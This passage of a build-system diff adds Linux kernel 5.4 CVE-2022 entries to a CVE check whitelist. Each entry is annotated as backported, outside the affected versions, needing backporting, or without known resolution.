+CVE_CHECK_WHITELIST += "CVE-2022-0500"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-0516"
+
+# cpe-stable-backport: Backported in 5.4.176
+CVE_CHECK_WHITELIST += "CVE-2022-0617"
+
+# cpe-stable-backport: Backported in 5.4.156
+CVE_CHECK_WHITELIST += "CVE-2022-0644"
+
+# fixed-version: only affects 5.17rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-0646"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-0742"
+
+# cpe-stable-backport: Backported in 5.4.53
+CVE_CHECK_WHITELIST += "CVE-2022-0812"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-0847"
+
+# cpe-stable-backport: Backported in 5.4.132
+CVE_CHECK_WHITELIST += "CVE-2022-0850"
+
+# fixed-version: only affects 5.17rc6 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-0854"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-0995"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-0998"
+
+# cpe-stable-backport: Backported in 5.4.185
+CVE_CHECK_WHITELIST += "CVE-2022-1011"
+
+# cpe-stable-backport: Backported in 5.4.197
+CVE_CHECK_WHITELIST += "CVE-2022-1012"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1015"
+
+# cpe-stable-backport: Backported in 5.4.188
+CVE_CHECK_WHITELIST += "CVE-2022-1016"
+
+# fixed-version: only affects 5.12rc3 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1043"
+
+# cpe-stable-backport: Backported in 5.4.193
+CVE_CHECK_WHITELIST += "CVE-2022-1048"
+
+# cpe-stable-backport: Backported in 5.4.177
+CVE_CHECK_WHITELIST += "CVE-2022-1055"
+
+# CVE-2022-1116 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2022-1158"
+
+# cpe-stable-backport: Backported in 5.4.198
+CVE_CHECK_WHITELIST += "CVE-2022-1184"
+
+# cpe-stable-backport: Backported in 5.4.169
+CVE_CHECK_WHITELIST += "CVE-2022-1195"
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2022-1198"
+
+# cpe-stable-backport: Backported in 5.4.185
+CVE_CHECK_WHITELIST += "CVE-2022-1199"
+
+# cpe-stable-backport: Backported in 5.4.190
+CVE_CHECK_WHITELIST += "CVE-2022-1204"
+
+# fixed-version: only affects 5.17rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1205"
+
+# CVE-2022-1247 has no known resolution
+
+# CVE-2022-1263 needs backporting (fixed from 5.18rc3)
+
+# CVE-2022-1280 needs backporting (fixed from 5.15rc1)
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2022-1353"
+
+# cpe-stable-backport: Backported in 5.4.21
+CVE_CHECK_WHITELIST += "CVE-2022-1419"
+
+# cpe-stable-backport: Backported in 5.4.208
+CVE_CHECK_WHITELIST += "CVE-2022-1462"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1508"
+
+# fixed-version: only affects 5.7rc5 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1516"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1651"
+
+# cpe-stable-backport: Backported in 5.4.196
+CVE_CHECK_WHITELIST += "CVE-2022-1652"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1671"
+
+# fixed-version: Fixed after version 4.20rc1
+CVE_CHECK_WHITELIST += "CVE-2022-1678"
+
+# cpe-stable-backport: Backported in 5.4.211
+CVE_CHECK_WHITELIST += "CVE-2022-1679"
+
+# cpe-stable-backport: Backported in 5.4.196
+CVE_CHECK_WHITELIST += "CVE-2022-1729"
+
+# cpe-stable-backport: Backported in 5.4.193
+CVE_CHECK_WHITELIST += "CVE-2022-1734"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1786"
+
+# CVE-2022-1789 needs backporting (fixed from 5.18)
+
+# cpe-stable-backport: Backported in 5.4.192
+CVE_CHECK_WHITELIST += "CVE-2022-1836"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1852"
+
+# fixed-version: only affects 5.17rc8 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1882"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1943"
+
+# cpe-stable-backport: Backported in 5.4.198
+CVE_CHECK_WHITELIST += "CVE-2022-1966"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1972"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1973"
+
+# cpe-stable-backport: Backported in 5.4.193
+CVE_CHECK_WHITELIST += "CVE-2022-1974"
+
+# cpe-stable-backport: Backported in 5.4.193
+CVE_CHECK_WHITELIST += "CVE-2022-1975"
+
+# fixed-version: only affects 5.18rc2 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1976"
+
+# fixed-version: only affects 5.13rc7 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1998"
+
+# cpe-stable-backport: Backported in 5.4.181
+CVE_CHECK_WHITELIST += "CVE-2022-20008"
+
+# cpe-stable-backport: Backported in 5.4.165
+CVE_CHECK_WHITELIST += "CVE-2022-20132"
+
+# cpe-stable-backport: Backported in 5.4.145
+CVE_CHECK_WHITELIST += "CVE-2022-20141"
+
+# CVE-2022-20148 needs backporting (fixed from 5.16rc1)
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-20153"
+
+# cpe-stable-backport: Backported in 5.4.170
+CVE_CHECK_WHITELIST += "CVE-2022-20154"
+
+# cpe-stable-backport: Backported in 5.4.187
+CVE_CHECK_WHITELIST += "CVE-2022-20158"
+
+# CVE-2022-20166 needs backporting (fixed from 5.10rc1)
+
+# cpe-stable-backport: Backported in 5.4.187
+CVE_CHECK_WHITELIST += "CVE-2022-20368"
+
+# cpe-stable-backport: Backported in 5.4.210
+CVE_CHECK_WHITELIST += "CVE-2022-20369"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-20409"
+
+# cpe-stable-backport: Backported in 5.4.213
+CVE_CHECK_WHITELIST += "CVE-2022-20421"
+
+# cpe-stable-backport: Backported in 5.4.211
+CVE_CHECK_WHITELIST += "CVE-2022-20422"
+
+# fixed-version: only affects 5.17rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-20423"
+
+# CVE-2022-20424 needs backporting (fixed from 5.12rc1)
+
+# cpe-stable-backport: Backported in 5.4.63
+CVE_CHECK_WHITELIST += "CVE-2022-20565"
+
+# cpe-stable-backport: Backported in 5.4.209
+CVE_CHECK_WHITELIST += "CVE-2022-20566"
+
+# fixed-version: Fixed after version 4.16rc5
+CVE_CHECK_WHITELIST += "CVE-2022-20567"
+
+# fixed-version: only affects 5.7rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-20568"
+
+# cpe-stable-backport: Backported in 5.4.197
+CVE_CHECK_WHITELIST += "CVE-2022-20572"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-2078"
+
+# cpe-stable-backport: Backported in 5.4.199
+CVE_CHECK_WHITELIST += "CVE-2022-21123"
+
+# cpe-stable-backport: Backported in 5.4.199
+CVE_CHECK_WHITELIST += "CVE-2022-21125"
+
+# cpe-stable-backport: Backported in 5.4.199
+CVE_CHECK_WHITELIST += "CVE-2022-21166"
+
+# fixed-version: Fixed after version 4.20
+CVE_CHECK_WHITELIST += "CVE-2022-21385"
+
+# cpe-stable-backport: Backported in 5.4.197
+CVE_CHECK_WHITELIST += "CVE-2022-21499"
+
+# cpe-stable-backport: Backported in 5.4.208
+CVE_CHECK_WHITELIST += "CVE-2022-21505"
+
+# cpe-stable-backport: Backported in 5.4.211
+CVE_CHECK_WHITELIST += "CVE-2022-2153"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-2196"
+
+# CVE-2022-2209 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.175
+CVE_CHECK_WHITELIST += "CVE-2022-22942"
+
+# cpe-stable-backport: Backported in 5.4.184
+CVE_CHECK_WHITELIST += "CVE-2022-23036"
+
+# cpe-stable-backport: Backported in 5.4.184
+CVE_CHECK_WHITELIST += "CVE-2022-23037"
+
+# cpe-stable-backport: Backported in 5.4.184
+CVE_CHECK_WHITELIST += "CVE-2022-23038"
+
+# cpe-stable-backport: Backported in 5.4.184
+CVE_CHECK_WHITELIST += "CVE-2022-23039"
+
+# cpe-stable-backport: Backported in 5.4.184
+CVE_CHECK_WHITELIST += "CVE-2022-23040"
+
+# cpe-stable-backport: Backported in 5.4.184
+CVE_CHECK_WHITELIST += "CVE-2022-23041"
+
+# cpe-stable-backport: Backported in 5.4.184
+CVE_CHECK_WHITELIST += "CVE-2022-23042"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-2308"
+
+# cpe-stable-backport: Backported in 5.4.204
+CVE_CHECK_WHITELIST += "CVE-2022-2318"
+
+# CVE-2022-23222 needs backporting (fixed from 5.17rc1)
+
+# CVE-2022-2327 needs backporting (fixed from 5.12rc1)
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2022-2380"
+
+# cpe-stable-backport: Backported in 5.4.217
+CVE_CHECK_WHITELIST += "CVE-2022-23816"
+
+# CVE-2022-23825 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.184
+CVE_CHECK_WHITELIST += "CVE-2022-23960"
+
+# fixed-version: only affects 5.14rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-24122"
+
+# cpe-stable-backport: Backported in 5.4.176
+CVE_CHECK_WHITELIST += "CVE-2022-24448"
+
+# cpe-stable-backport: Backported in 5.4.183
+CVE_CHECK_WHITELIST += "CVE-2022-24958"
+
+# cpe-stable-backport: Backported in 5.4.176
+CVE_CHECK_WHITELIST += "CVE-2022-24959"
+
+# cpe-stable-backport: Backported in 5.4.197
+CVE_CHECK_WHITELIST += "CVE-2022-2503"
+
+# cpe-stable-backport: Backported in 5.4.180
+CVE_CHECK_WHITELIST += "CVE-2022-25258"
+
+# CVE-2022-25265 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.180
+CVE_CHECK_WHITELIST += "CVE-2022-25375"
+
+# cpe-stable-backport: Backported in 5.4.182
+CVE_CHECK_WHITELIST += "CVE-2022-25636"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-2585"
+
+# cpe-stable-backport: Backported in 5.4.211
+CVE_CHECK_WHITELIST += "CVE-2022-2586"
+
+# cpe-stable-backport: Backported in 5.4.211
+CVE_CHECK_WHITELIST += "CVE-2022-2588"
+
+# fixed-version: only affects 5.16rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-2590"
+
+# cpe-stable-backport: Backported in 5.4.220
+CVE_CHECK_WHITELIST += "CVE-2022-2602"
+
+# cpe-stable-backport: Backported in 5.4.204
+CVE_CHECK_WHITELIST += "CVE-2022-26365"
+
+# cpe-stable-backport: Backported in 5.4.210
+CVE_CHECK_WHITELIST += "CVE-2022-26373"
+
+# cpe-stable-backport: Backported in 5.4.191
+CVE_CHECK_WHITELIST += "CVE-2022-2639"
+
+# cpe-stable-backport: Backported in 5.4.188
+CVE_CHECK_WHITELIST += "CVE-2022-26490"
+
+# cpe-stable-backport: Backported in 5.4.213
+CVE_CHECK_WHITELIST += "CVE-2022-2663"
+
+# CVE-2022-26878 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.182
+CVE_CHECK_WHITELIST += "CVE-2022-26966"
+
+# cpe-stable-backport: Backported in 5.4.182
+CVE_CHECK_WHITELIST += "CVE-2022-27223"
+
+# cpe-stable-backport: Backported in 5.4.188
+CVE_CHECK_WHITELIST += "CVE-2022-27666"
+
+# CVE-2022-27672 needs backporting (fixed from 6.2)
+
+# fixed-version: only affects 5.18rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-2785"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-27950"
+
+# cpe-stable-backport: Backported in 5.4.188
+CVE_CHECK_WHITELIST += "CVE-2022-28356"
+
+# cpe-stable-backport: Backported in 5.4.191
+CVE_CHECK_WHITELIST += "CVE-2022-28388"
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2022-28389"
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2022-28390"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-2873"
+
+# fixed-version: only affects 5.17rc3 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-28796"
+
+# cpe-stable-backport: Backported in 5.4.196
+CVE_CHECK_WHITELIST += "CVE-2022-28893"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-2905"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-29156"
+
+# cpe-stable-backport: Backported in 5.4.177
+CVE_CHECK_WHITELIST += "CVE-2022-2938"
+
+# cpe-stable-backport: Backported in 5.4.191
+CVE_CHECK_WHITELIST += "CVE-2022-29581"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-29582"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-2959"
+
+# CVE-2022-2961 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.180
+CVE_CHECK_WHITELIST += "CVE-2022-2964"
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2022-2977"
+
+# cpe-stable-backport: Backported in 5.4.218
+CVE_CHECK_WHITELIST += "CVE-2022-2978"
+
+# cpe-stable-backport: Backported in 5.4.217
+CVE_CHECK_WHITELIST += "CVE-2022-29900"
+
+# cpe-stable-backport: Backported in 5.4.217
+CVE_CHECK_WHITELIST += "CVE-2022-29901"
+
+# CVE-2022-2991 needs backporting (fixed from 5.15rc1)
+
+# fixed-version: only affects 5.16rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-29968"
+
+# cpe-stable-backport: Backported in 5.4.212
+CVE_CHECK_WHITELIST += "CVE-2022-3028"
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2022-30594"
+
+# CVE-2022-3061 needs backporting (fixed from 5.18rc5)
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3077"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3078"
+
+# fixed-version: only affects 6.0rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3103"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3104"
+
+# cpe-stable-backport: Backported in 5.4.171
+CVE_CHECK_WHITELIST += "CVE-2022-3105"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3106"
+
+# cpe-stable-backport: Backported in 5.4.187
+CVE_CHECK_WHITELIST += "CVE-2022-3107"
+
+# CVE-2022-3108 needs backporting (fixed from 5.17rc1)
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3110"
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2022-3111"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3112"
+
+# fixed-version: only affects 5.10rc6 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3113"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3114"
+
+# cpe-stable-backport: Backported in 5.4.198
+CVE_CHECK_WHITELIST += "CVE-2022-3115"
+
+# cpe-stable-backport: Backported in 5.4.226
+CVE_CHECK_WHITELIST += "CVE-2022-3169"
+
+# fixed-version: only affects 6.0rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3170"
+
+# CVE-2022-3176 needs backporting (fixed from 5.17rc1)
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2022-3202"
+
+# cpe-stable-backport: Backported in 5.4.198
+CVE_CHECK_WHITELIST += "CVE-2022-32250"
+
+# cpe-stable-backport: Backported in 5.4.201
+CVE_CHECK_WHITELIST += "CVE-2022-32296"
+
+# CVE-2022-3238 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2022-3239"
+
+# cpe-stable-backport: Backported in 5.4.198
+CVE_CHECK_WHITELIST += "CVE-2022-32981"
+
+# cpe-stable-backport: Backported in 5.4.215
+CVE_CHECK_WHITELIST += "CVE-2022-3303"
+
+# CVE-2022-3344 needs backporting (fixed from 6.1rc7)
+
+# cpe-stable-backport: Backported in 5.4.204
+CVE_CHECK_WHITELIST += "CVE-2022-33740"
+
+# cpe-stable-backport: Backported in 5.4.204
+CVE_CHECK_WHITELIST += "CVE-2022-33741"
+
+# cpe-stable-backport: Backported in 5.4.204
+CVE_CHECK_WHITELIST += "CVE-2022-33742"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-33743"
+
+# cpe-stable-backport: Backported in 5.4.204
+CVE_CHECK_WHITELIST += "CVE-2022-33744"
+
+# cpe-stable-backport: Backported in 5.4.192
+CVE_CHECK_WHITELIST += "CVE-2022-33981"
+
+# cpe-stable-backport: Backported in 5.4.229
+CVE_CHECK_WHITELIST += "CVE-2022-3424"
+
+# fixed-version: only affects 5.18rc2 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3435"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-34494"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-34495"
+
+# cpe-stable-backport: Backported in 5.4.244
+CVE_CHECK_WHITELIST += "CVE-2022-34918"
+
+# cpe-stable-backport: Backported in 5.4.225
+CVE_CHECK_WHITELIST += "CVE-2022-3521"
+
+# CVE-2022-3522 needs backporting (fixed from 6.1rc1)
+
+# CVE-2022-3523 needs backporting (fixed from 6.1rc1)
+
+# cpe-stable-backport: Backported in 5.4.224
+CVE_CHECK_WHITELIST += "CVE-2022-3524"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3526"
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3531"
+
+# fixed-version: only affects 6.1rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3532"
+
+# CVE-2022-3533 has no known resolution
+
+# CVE-2022-3534 needs backporting (fixed from 6.2rc1)
+
+# cpe-stable-backport: Backported in 5.4.220
+CVE_CHECK_WHITELIST += "CVE-2022-3535"
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3541"
+
+# cpe-stable-backport: Backported in 5.4.220
+CVE_CHECK_WHITELIST += "CVE-2022-3542"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3543"
+
+# CVE-2022-3544 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.228
+CVE_CHECK_WHITELIST += "CVE-2022-3545"
+
+# cpe-stable-backport: Backported in 5.4.224
+CVE_CHECK_WHITELIST += "CVE-2022-3564"
+
+# cpe-stable-backport: Backported in 5.4.220
+CVE_CHECK_WHITELIST += "CVE-2022-3565"
+
+# CVE-2022-3566 needs backporting (fixed from 6.1rc1)
+
+# CVE-2022-3567 needs backporting (fixed from 6.1rc1)
+
+# cpe-stable-backport: Backported in 5.4.198
+CVE_CHECK_WHITELIST += "CVE-2022-3577"
+
+# cpe-stable-backport: Backported in 5.4.213
+CVE_CHECK_WHITELIST += "CVE-2022-3586"
+
+# cpe-stable-backport: Backported in 5.4.220
+CVE_CHECK_WHITELIST += "CVE-2022-3594"
+
+# CVE-2022-3595 needs backporting (fixed from 6.1rc1)
+
+# CVE-2022-3606 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.207
+CVE_CHECK_WHITELIST += "CVE-2022-36123"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3619"
+
+# cpe-stable-backport: Backported in 5.4.218
+CVE_CHECK_WHITELIST += "CVE-2022-3621"
+
+# cpe-stable-backport: Backported in 5.4.228
+CVE_CHECK_WHITELIST += "CVE-2022-3623"
+
+# CVE-2022-3624 needs backporting (fixed from 6.0rc1)
+
+# cpe-stable-backport: Backported in 5.4.211
+CVE_CHECK_WHITELIST += "CVE-2022-3625"
+
+# cpe-stable-backport: Backported in 5.4.224
+CVE_CHECK_WHITELIST += "CVE-2022-3628"
+
+# cpe-stable-backport: Backported in 5.4.229
+CVE_CHECK_WHITELIST += "CVE-2022-36280"
+
+# cpe-stable-backport: Backported in 5.4.211
+CVE_CHECK_WHITELIST += "CVE-2022-3629"
+
+# fixed-version: only affects 5.19rc6 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3630"
+
+# cpe-stable-backport: Backported in 5.4.211
+CVE_CHECK_WHITELIST += "CVE-2022-3633"
+
+# cpe-stable-backport: Backported in 5.4.211
+CVE_CHECK_WHITELIST += "CVE-2022-3635"
+
+# CVE-2022-3636 needs backporting (fixed from 5.19rc1)
+
+# fixed-version: only affects 5.19 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3640"
+
+# CVE-2022-36402 needs backporting (fixed from 6.5)
+
+# CVE-2022-3642 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.227
+CVE_CHECK_WHITELIST += "CVE-2022-3643"
+
+# cpe-stable-backport: Backported in 5.4.218
+CVE_CHECK_WHITELIST += "CVE-2022-3646"
+
+# cpe-stable-backport: Backported in 5.4.220
+CVE_CHECK_WHITELIST += "CVE-2022-3649"
+
+# cpe-stable-backport: Backported in 5.4.208
+CVE_CHECK_WHITELIST += "CVE-2022-36879"
+
+# cpe-stable-backport: Backported in 5.4.209
+CVE_CHECK_WHITELIST += "CVE-2022-36946"
+
+# cpe-stable-backport: Backported in 5.4.233
+CVE_CHECK_WHITELIST += "CVE-2022-3707"
+
+# CVE-2022-38096 has no known resolution
+
+# CVE-2022-38457 needs backporting (fixed from 6.2rc4)
+
+# CVE-2022-3903 needs backporting (fixed from 6.1rc2)
+
+# fixed-version: only affects 5.18 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3910"
+
+# CVE-2022-39188 needs backporting (fixed from 5.19rc8)
+
+# cpe-stable-backport: Backported in 5.4.244
+CVE_CHECK_WHITELIST += "CVE-2022-39189"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-39190"
+
+# fixed-version: only affects 5.18rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3977"
+
+# cpe-stable-backport: Backported in 5.4.215
+CVE_CHECK_WHITELIST += "CVE-2022-39842"
+
+# CVE-2022-40133 needs backporting (fixed from 6.2rc4)
+
+# cpe-stable-backport: Backported in 5.4.213
+CVE_CHECK_WHITELIST += "CVE-2022-40307"
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-40476"
+
+# cpe-stable-backport: Backported in 5.4.218
+CVE_CHECK_WHITELIST += "CVE-2022-40768"
+
+# cpe-stable-backport: Backported in 5.4.213
+CVE_CHECK_WHITELIST += "CVE-2022-4095"
+
+# cpe-stable-backport: Backported in 5.4.252
+CVE_CHECK_WHITELIST += "CVE-2022-40982"
+
+# cpe-stable-backport: Backported in 5.4.229
+CVE_CHECK_WHITELIST += "CVE-2022-41218"
+
+# cpe-stable-backport: Backported in 5.4.211
+CVE_CHECK_WHITELIST += "CVE-2022-41222"
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-4127"
+
+# fixed-version: only affects 5.17rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-4128"
+
+# cpe-stable-backport: Backported in 5.4.231
+CVE_CHECK_WHITELIST += "CVE-2022-4129"
+
+# fixed-version: only affects 5.17rc2 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-4139"
+
+# cpe-stable-backport: Backported in 5.4.218
+CVE_CHECK_WHITELIST += "CVE-2022-41674"
+
+# CVE-2022-41848 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.220
+CVE_CHECK_WHITELIST += "CVE-2022-41849"
+
+# cpe-stable-backport: Backported in 5.4.220
+CVE_CHECK_WHITELIST += "CVE-2022-41850"
+
+# cpe-stable-backport: Backported in 5.4.190
+CVE_CHECK_WHITELIST += "CVE-2022-41858"
+
+# fixed-version: only affects 5.16rc7 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-42328"
+
+# fixed-version: only affects 5.16rc7 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-42329"
+
+# cpe-stable-backport: Backported in 5.4.215
+CVE_CHECK_WHITELIST += "CVE-2022-42432"
+
+# CVE-2022-4269 needs backporting (fixed from 6.3rc1)
+
+# cpe-stable-backport: Backported in 5.4.212
+CVE_CHECK_WHITELIST += "CVE-2022-42703"
+
+# cpe-stable-backport: Backported in 5.4.219
+CVE_CHECK_WHITELIST += "CVE-2022-42719"
+
+# cpe-stable-backport: Backported in 5.4.218
+CVE_CHECK_WHITELIST += "CVE-2022-42720"
+
+# cpe-stable-backport: Backported in 5.4.218
+CVE_CHECK_WHITELIST += "CVE-2022-42721"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-42722"
+
+# cpe-stable-backport: Backported in 5.4.224
+CVE_CHECK_WHITELIST += "CVE-2022-42895"
+
+# cpe-stable-backport: Backported in 5.4.226
+CVE_CHECK_WHITELIST += "CVE-2022-42896"
+
+# cpe-stable-backport: Backported in 5.4.218
+CVE_CHECK_WHITELIST += "CVE-2022-43750"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-4378"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-4379"
+
+# cpe-stable-backport: Backported in 5.4.230
+CVE_CHECK_WHITELIST += "CVE-2022-4382"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-43945"
+
+# CVE-2022-44032 needs backporting (fixed from 6.4rc1)
+
+# CVE-2022-44033 needs backporting (fixed from 6.4rc1)
+
+# CVE-2022-44034 needs backporting (fixed from 6.4rc1)
+
+# CVE-2022-4543 has no known resolution
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-45869"
+
+# CVE-2022-45884 has no known resolution
+
+# CVE-2022-45885 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.246
+CVE_CHECK_WHITELIST += "CVE-2022-45886"
+
+# cpe-stable-backport: Backported in 5.4.246
+CVE_CHECK_WHITELIST += "CVE-2022-45887"
+
+# fixed-version: only affects 5.14rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-45888"
+
+# cpe-stable-backport: Backported in 5.4.246
+CVE_CHECK_WHITELIST += "CVE-2022-45919"
+
+# cpe-stable-backport: Backported in 5.4.229
+CVE_CHECK_WHITELIST += "CVE-2022-45934"
+
+# cpe-stable-backport: Backported in 5.4.213
+CVE_CHECK_WHITELIST += "CVE-2022-4662"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-4696"
+
+# cpe-stable-backport: Backported in 5.4.240
+CVE_CHECK_WHITELIST += "CVE-2022-4744"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-47518"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-47519"
+
+# CVE-2022-47520 needs backporting (fixed from 6.1rc8)
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-47521"
+
+# cpe-stable-backport: Backported in 5.4.229
+CVE_CHECK_WHITELIST += "CVE-2022-47929"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-47938"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-47939"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-47940"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-47941"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-47942"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-47943"
+
